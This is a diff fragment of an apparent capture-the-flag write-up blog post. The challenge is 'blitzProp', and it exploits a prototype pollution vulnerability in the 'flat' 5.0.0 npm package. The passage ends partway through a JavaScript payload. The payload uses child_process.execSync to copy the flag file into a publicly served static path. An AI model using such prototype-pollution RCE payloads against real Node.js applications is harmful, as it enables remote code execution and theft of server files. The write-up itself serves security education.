ox7f/ox7f.github.io/_posts/2021-04-25-blitzProp.md

 After reviewing the "package.json" file we can see that "flat" “5.0.0” is installed which suffers from a Prototype Pollution vulnerability via Abstract Syntax Tree.
 [Here](https://github.com/hughsk/flat/issues/105) you can find the PoC.

 ## Exploitation
-To exploit this vulnerability and read the flag, we just sent the below payload to ""/api/submit":
+To exploit this vulnerability and read the flag, we just open the web console and sent the below payload to "/api/submit":

 ```javascript
 let CMD = "process.mainModule.require('child_process').execSync('cat /app/flag* >> /app/static/js/flag.txt')"